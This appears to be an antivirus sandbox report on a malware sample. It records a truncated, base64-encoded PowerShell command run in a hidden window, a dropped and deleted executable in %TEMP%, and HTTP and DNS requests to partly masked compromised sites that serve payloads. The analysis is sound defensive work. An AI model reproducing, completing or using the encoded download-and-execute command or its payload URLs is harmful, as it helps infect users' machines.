Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...
Modifies file system
Creates the following files
- %TEMP%\word\2019\zlcoy_4.exe
Deletes the following files
- %TEMP%\word\2019\zlcoy_4.exe
Network activity
TCP
HTTP GET requests
- http://ca###oomz.com/wp-includes/rPG/
- http://ne###ekulac.com/wp-content/dTl4ul/
- http://to#####aelconfort.com/cgi-bin/wp/
- http://to#####aelconfort.com/cgi-sys/suspendedpage.cgi
- http://di###rmedia.com/wp-admin/8/
- http://di###rmedia.com/wp-admin/8
- http://av##mda.com/huseyingulgec.com.tr/cO1DS8G/
UDP
- DNS ASK ca###oomz.com
- DNS ASK ne###ekulac.com
- DNS ASK ho#####technologies.com
- DNS ASK to#####aelconfort.com
- DNS ASK aa#####itibhusawal.org
- DNS ASK di###rmedia.com
- DNS ASK av##mda.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...' (with hidden window)
